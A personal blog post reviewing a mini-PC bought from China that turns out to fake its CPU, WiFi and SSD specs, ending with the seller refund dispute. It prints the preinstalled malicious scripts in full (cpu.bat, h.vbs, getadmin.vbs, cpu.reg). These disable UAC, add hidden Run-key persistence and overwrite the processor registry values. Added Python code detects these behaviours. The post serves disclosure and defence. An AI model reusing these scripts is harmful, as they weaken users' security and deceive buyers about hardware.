In this article I show the unboxing of an Intel Core i9 Mini PC. It was time to replace my existing monitor mounted PC. My existing "mini-PC" (Industrial VESA mounted - Intel Core i5 5200U Windows 10 Pro DDR3) lasted about 5 years but was not Windows 11 compatible and only had a small SSD and the O/S partition was running out of space. So, it was time for an upgrade...
Overview
After reviewing the price and specs of replacement machines, I decided to purchase a machine direct from China. I landed on another mini-PC with an older Intel Core i9 chip. While this is an older (now obsolete) CPU, all the reviews are very positive, and I could not discount the "bang for the buck" that going with this machine offered. In my case, this machine is not for gaming but for day-to-day office work, so I am not concerned about heavy graphics (i.e. GPU) demand and the embedded Intel UHD graphics capabilities are just fine. I wanted to focus on a relatively fast CPU, at least 16 Gbytes of DDR4 RAM and a 2 TByte SSD. It also had to be capable of driving at least 2 monitors.
I was able to source a "no name" machine for under $300 direct from China on a Black Friday deal. I could not find anything close to the specs for the price of this machine from local retailers. In fact, the best that I could do locally was to purchase a 2 Tbyte WD SSD on a Black Friday deal for $200!
Specifications
- CPU: Core i9 8950HK - 4 Cores, 4 threads - up to 3.4 GHz
- RAM: 16 Gig DDR4
- Disk: 2 Tbyte M.2 NVMe SSD
- 4K Video Output: 4K HDMI x2, 4K Type C x1
- Ports: USB 3.0 x2, USB 2.0 x2, Type C x2
- Audio: Mini Audio jack
- WiFi: WiFi 6
- O/S: Windows 11 Pro
- Dimensions (inches): 4 1/2 x 4 1/2 x 1 1/2
Unboxing Video:
I was pleased with the quality of the packaging and the speed with which the machine arrived. This is especially surprising given that the machine was ordered during the nationwide postal strike. The machine took about 2 weeks to be delivered. The machine appears extremely well made, and the only issue was that instead of supplying me with a power supply with a North American plug, they supplied a European plug and included a socket converter. Not a big issue.
Review of the Machine
Having had the opportunity to use the machine for a while now (within an hour), I can safely state that it is a great machine, well worth two or three times the investment! However, it appears to be a fake!!!
Machine is a Fake
Something fishy about the build on the machine prompted me to take a closer look. What triggered my suspicion was that when I checked my User Account Control (UAC) settings, I saw that they were set at the lowest setting. So, I changed it to the highest level.
However, after a reboot I noticed that it was set back to the lowest setting. I traced this back to a file, "cpu.bat", that was being executed on Windows login. I then traced what the machine was doing more closely and discovered that the machine was set up to run a VB script on login. The script is "h.vbs".
What next? I checked the Windows startup apps and sure enough there is a startup app called "h.vbs". Here it is (I have already turned it off).
Now to completely get rid of the offending app, I downloaded and ran Sysinternals:
You can see that the Sysinternals scan immediately identifies the suspect script (highlighted in red), so I used Sysinternals to remove it.
So, what do the hacking scripts do? I have included them so that you can preview them.
cpu.bat
@echo off
REM ________________________________________________________________
>nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system"
if '%errorlevel%' NEQ '0' (
echo Open Command Prompt Administrator...
goto UACPrompt
) else ( goto gotAdmin )
:UACPrompt
echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs"
echo UAC.ShellExecute "%~s0", "", "", "runas", 1 >> "%temp%\getadmin.vbs"
"%temp%\getadmin.vbs"
exit /B
:gotAdmin
if exist "%temp%\getadmin.vbs" ( del "%temp%\getadmin.vbs" )
pushd "%CD%"
CD /D "%~dp0"
pushd %~dp0
@echo off
rem*************************************************************************************************************************
reg import "%~dp01.reg"
rem*************************************************************************************************************************
rem reg add "hkcu\software\microsoft\internet explorer\main" /v "window title" /t reg_sz /d "科技以人为本" /f
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f
if exist c:\windows\h.vbs goto reg
for /f "tokens=*" %%a in ('echo %0') do (set dpnx=%%a)
copy "%dpnx%" c:\windows\cpu.bat && attrib c:\windows\cpu.bat +h
(
echo set bqad=createobject^("wscript.shell"^)
echo bqad.run "c:\windows\cpu.bat",vbhide
echo wscript.quit
)>c:\windows\h.vbs
attrib c:\windows\h.vbs +h
reg add hklm\software\microsoft\windows\currentversion\run /v hrvbs /t reg_sz /d c:\windows\h.vbs /f
copy "%~dp0cpu.reg" c:\windows\
regedit /s c:\windows\cpu.reg
del "%dpnx%"
taskkill /f /im conime.exe
exit
:reg
regedit /s c:\windows\cpu.reg
taskkill /f /im conime.exe
exit
rem End::::::::::::::::::::::::::::::::
h.vbs
set bqad=createobject("wscript.shell")
bqad.run "c:\windows\cpu.bat",vbhide
wscript.quit
getadmin.vbs
Set UAC = CreateObject("Shell.Application")
UAC.ShellExecute "C:\Windows\cpu.bat", "", "", "runas", 1
From examining the scripts, you can see that they "downgrade" the user's access controls to the lowest level (cpu.bat sets EnableLUA to 0), and that they also change details in the registry to "fake" what the machine reports as its specs. The script imports a file named cpu.reg to make it appear that it is a higher-end machine.
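As an added example (not code from the original scripts or from any tool used in this article), the Python below statically flags the behaviours just described in a batch script and a .reg file: UAC disabled, Run-key persistence, hidden files, silent registry imports and CPU identity values written under HKLM\HARDWARE, a hive Windows rebuilds at every boot, which is why cpu.bat has to re-import cpu.reg at each login. The rule names, the 200 MHz tolerance and the sample strings (lines copied from the cpu.bat and cpu.reg listings on this page) are assumptions of this example.

```python
import re

# Constructed sample: lines copied from the cpu.bat and cpu.reg listings on this page.
CPU_BAT = r'''reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f
copy "%dpnx%" c:\windows\cpu.bat && attrib c:\windows\cpu.bat +h
reg add hklm\software\microsoft\windows\currentversion\run /v hrvbs /t reg_sz /d c:\windows\h.vbs /f
regedit /s c:\windows\cpu.reg'''
CPU_REG = r'''Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0]
"ProcessorNameString"="Intel(R) Core(TM) i9-8950HK CPU @ 2.90GHz"
"~MHz"=dword:000007cd'''

# Rule names are this example's own labels, not a standard taxonomy.
BAT_RULES = {
    "uac_disabled": r'reg\s+add\s.*policies\\system.*enablelua.*\s/d\s+0\b',
    "run_key_persistence": r'reg\s+add\s+"?(hklm|hkey_local_machine)'
                           r'\\software\\microsoft\\windows\\currentversion\\run\b',
    "hidden_file": r'attrib\s.*\s\+h\b',
    "silent_reg_import": r'regedit\s+/s\s+\S+\.reg\b',
}
CPU_KEY = re.compile(r'\\HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\\d+$', re.I)

def triage_bat(text):
    """Map each rule that fires to the 1-based script lines it matched."""
    hits = {}
    for n, line in enumerate(text.splitlines(), 1):
        for rule, rx in BAT_RULES.items():
            if re.search(rx, line, re.I):
                hits.setdefault(rule, []).append(n)
    return hits

def triage_reg(text, tolerance_mhz=200):
    """Flag CPU identity values a .reg file writes under the volatile HARDWARE hive."""
    findings, key, claimed = [], "", None
    for line in (l.strip() for l in text.splitlines()):
        if line.startswith("["):
            key, claimed = line.strip("[]"), None
        elif CPU_KEY.search(key):
            name = re.match(r'"ProcessorNameString"="(.*)"$', line)
            mhz = re.match(r'"~MHz"=dword:([0-9a-f]{8})$', line, re.I)
            if name:
                findings.append(("cpu_name_overwritten", name.group(1)))
                ghz = re.search(r'@\s*([\d.]+)GHz', name.group(1))
                claimed = round(float(ghz.group(1)) * 1000) if ghz else None
            # Heuristic: the GHz in the name string should roughly match ~MHz.
            if mhz and claimed and abs(claimed - int(mhz.group(1), 16)) > tolerance_mhz:
                findings.append(("clock_mismatch", claimed, int(mhz.group(1), 16)))
    return findings
```

On the sample, the name string claims 2.90 GHz while the ~MHz value in the same file decodes to 1997, so the faked values do not even agree with each other.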
cpu.reg
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor]
[HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0]
"Component Information"=hex:00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
"Identifier"="Intel64 Family 6 Model 156 Stepping 0"
"Configuration Data"=hex(9):ff,ff,ff,ff,ff,ff,ff,ff,00,00,00,00,00,00,00,00
"ProcessorNameString"="Intel(R) Core(TM) i9-8950HK CPU @ 2.90GHz"
"VendorIdentifier"="GenuineIntel"
"FeatureSet"=dword:3d1b3fff
"~MHz"=dword:000007cd
"Update Revision"=hex:00,00,00,00,1e,00,00,24
"Update Status"=dword:00000002
"Previous Update Revision"=hex:00,00,00,00,1e,00,00,24
"Platform Specific Field 1"=dword:00000001
[HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1]
"Component Information"=hex:00,00,00,00,00,00,00,00,01,00,00,00,00,00,01,00
"Identifier"="Intel64 Family 6 Model 156 Stepping 0"
"Configuration Data"=hex(9):ff,ff,ff,ff,ff,ff,ff,ff,00,00,00,00,00,00,00,00
"ProcessorNameString"="IIntel(R) Core(TM) i9-8950HK CPU @ 2.90GHz"
"VendorIdentifier"="GenuineIntel"
"FeatureSet"=dword:3d1b3fff
"~MHz"=dword:000007cd
"Update Revision"=hex:00,00,00,00,1e,00,00,24
"Update Status"=dword:00000002
"Previous Update Revision"=hex:00,00,00,00,1e,00,00,24
"Platform Specific Field 1"=dword:00000001
[HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\2]
"Component Information"=hex:00,00,00,00,00,00,00,00,02,00,00,00,00,00,02,00
"Identifier"="Intel64 Family 6 Model 156 Stepping 0"
"Configuration Data"=hex(9):ff,ff,ff,ff,ff,ff,ff,ff,00,00,00,00,00,00,00,00
"ProcessorNameString"="Intel(R) Core(TM) i9-8950HK CPU @ 2.90GHz"
"VendorIdentifier"="GenuineIntel"
"FeatureSet"=dword:3d1b3fff
"~MHz"=dword:000007cd
"Update Revision"=hex:00,00,00,00,1e,00,00,24
"Update Status"=dword:00000002
"Previous Update Revision"=hex:00,00,00,00,1e,00,00,24
"Platform Specific Field 1"=dword:00000001
[HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\3]
"Component Information"=hex:00,00,00,00,00,00,00,00,03,00,00,00,00,00,03,00
"Identifier"="Intel64 Family 6 Model 156 Stepping 0"
"Configuration Data"=hex(9):ff,ff,ff,ff,ff,ff,ff,ff,00,00,00,00,00,00,00,00
"ProcessorNameString"="Intel(R) Core(TM) i9-8950HK CPU @ 2.90GHz"
"VendorIdentifier"="GenuineIntel"
"FeatureSet"=dword:3d1b3fff
"~MHz"=dword:000007cd
"Update Revision"=hex:00,00,00,00,1e,00,00,24
"Update Status"=dword:00000002
"Previous Update Revision"=hex:00,00,00,00,1e,00,00,24
"Platform Specific Field 1"=dword:00000001
What Are the "Actual" CPU Specs?
With the malicious scripts disabled, the machine reports back its "actual" specs.
From Windows Specifications:
From BIOS:
So, there you have it - the machine is a fake 😡. The machine is, in fact, not based on an Intel i9 8950HK but on an Intel Celeron 5095 - a much lower-grade CPU.
Here is the difference in the specs (156% reduction in overall performance)
What Are the "Actual" WiFi Specs?
Given the malicious intent to mask the machine's CPU details/specifications, we took a look at the actual WiFi specifications, as the machine was sold as supporting WiFi 6. A quick assessment shows that the machine's radios do not support WiFi 6. The Command Prompt output does not show 802.11ax, indicating that the device does not support WiFi 6.
What Are the "Actual" Bluetooth (BT) Specs?
Given the malicious intent to mask the machine's CPU details/specifications, we took a look at the actual Bluetooth specifications, as the machine was sold as supporting BT 5.2. A quick assessment shows that the machine's radios do not support BT 5.2. Device Manager reports the firmware at LMP 10.x, indicating that the device does not support BT 5.2.
What Are the "Actual" SSD Specs?
We also took a look at the actual SSD specifications. The machine does not have an NVMe drive but a standard SATA SSD. You can see that the Bus type is "SATA" and not "NVMe".
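The three checks above (supported radio types from the Command Prompt, the LMP firmware version from Device Manager and the disk bus type) can be compared against the listing in one pass. This Python is an added example, not the author's procedure: the sample text follows the layout of netsh wlan show drivers output but is constructed, the dictionary keys and function names are hypothetical, and the LMP-to-Bluetooth mapping comes from the Bluetooth SIG assigned numbers rather than from this page.

```python
import re

# Constructed sample of `netsh wlan show drivers` output (abridged; adapter name is made up).
NETSH = """
    Driver                    : Example Wireless LAN Adapter
    Radio types supported     : 802.11b 802.11g 802.11n 802.11a 802.11ac
"""
# LMP major version -> Bluetooth Core version (Bluetooth SIG assigned numbers).
LMP_TO_BT = {6: "4.0", 7: "4.1", 8: "4.2", 9: "5.0", 10: "5.1", 11: "5.2", 12: "5.3"}
# 802.11 amendment -> Wi-Fi Alliance generation number.
WIFI_GEN = {"802.11n": 4, "802.11ac": 5, "802.11ax": 6}

def wifi_generation(netsh_text):
    """Highest Wi-Fi generation listed under 'Radio types supported' (0 if none)."""
    m = re.search(r"Radio types supported\s*:\s*(.+)", netsh_text)
    radios = m.group(1).split() if m else []
    return max((WIFI_GEN.get(r, 0) for r in radios), default=0)

def bt_version(lmp_text):
    """Turn Device Manager's 'LMP 10.x' firmware string into a Core version."""
    m = re.search(r"LMP\s+(\d+)", lmp_text)
    return LMP_TO_BT.get(int(m.group(1))) if m else None

def as_tuple(version):
    """'5.2' -> (5, 2) so versions compare numerically, not as strings."""
    return tuple(int(p) for p in version.split("."))

def audit(advertised, netsh_text, lmp_text, bus_type):
    """Return (component, advertised, observed) for every claim the hardware fails."""
    failed = []
    wifi = wifi_generation(netsh_text)
    if wifi < advertised["wifi_gen"]:
        failed.append(("wifi", advertised["wifi_gen"], wifi))
    bt = bt_version(lmp_text)
    if bt is None or as_tuple(bt) < as_tuple(advertised["bluetooth"]):
        failed.append(("bluetooth", advertised["bluetooth"], bt))
    if bus_type.upper() != advertised["ssd_bus"].upper():
        failed.append(("ssd_bus", advertised["ssd_bus"], bus_type))
    return failed

# Advertised values are the ones quoted on this page (hypothetical key names).
LISTING = {"wifi_gen": 6, "bluetooth": "5.2", "ssd_bus": "NVMe"}
```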
Requesting a Full Refund
Given the malicious intent to mask the actual machine details/specifications, effectively claiming that it is an Intel Core i9 8950HK, and that other components are not as advertised (WiFi 6, etc.) I have requested a full refund for the purchase. The actual machine (Intel Celeron N5095) is significantly lower in aggregate performance / quality compared to the machine ordered (Intel Core i9 8950HK). I will keep you posted on the status of the case.
Forensic Review Summary Document
First Round of Negotiations - Update
The seller was apologetic and tried to make the case that their supplier/manufacturer may have shipped the wrong machine and would provide a partial refund. I explained that this is not the case as there were deliberate steps taken to mask the machine specifications with the intent of defrauding the purchaser. The seller tried again to blame the supply chain to which I stated that given the situation, I was sticking with my refund request. I suspect that I am heading to an arbitration in this case.
After contacting the seller, I can see that their site has now adjusted its pricing and now states that the device comes with a 2Tbyte M.2 NGFF SATA drive instead of a 2Tbyte M.2 NVMe drive, but it still claims to support WiFi 6.
2nd Round of Negotiations - Update
AliExpress rejected the first refund request. A walk-through video was produced detailing the rationale for the refund request based on the Forensics report. The response was a $134 refund, but questions were raised as to the validity of the report (meaning, was it for the machine). This offer was rejected and an additional video was submitted, this time demonstrating directly on the PC that the machine is not what was ordered, and, given the fraudulent activity, a full refund was requested.
I recorded the video using an iPad; however, AliExpress does not support MOV files, and therefore I had to use the OBS "hack" approach to convert the file, as simply using conversion software (e.g. VLC) did not work. Here is the article describing how to convert the video file: How To? - Convert MOV (Apple) Video Format to MP4 (Industry Standard) Video Format
Final Update
After another back and forth with AliExpress, they provided 2 options:
- Return the machine - package it up, ship it and provide the bill to AliExpress for reimbursement. I would also receive a $40 voucher for the trouble.
- Keep the machine and get a $168.34 refund as well as the $40 voucher.
Since returning the machine is extra work, and I now have personally identifiable information on the machine, returning it is not an option. So I decided to take the refund of $168.34 plus the $40 discount coupon and keep the machine. The total for the machine after the refund is now $130.58 ($115.56 before tax). Taking the coupon into consideration, the total for the machine is $90.58.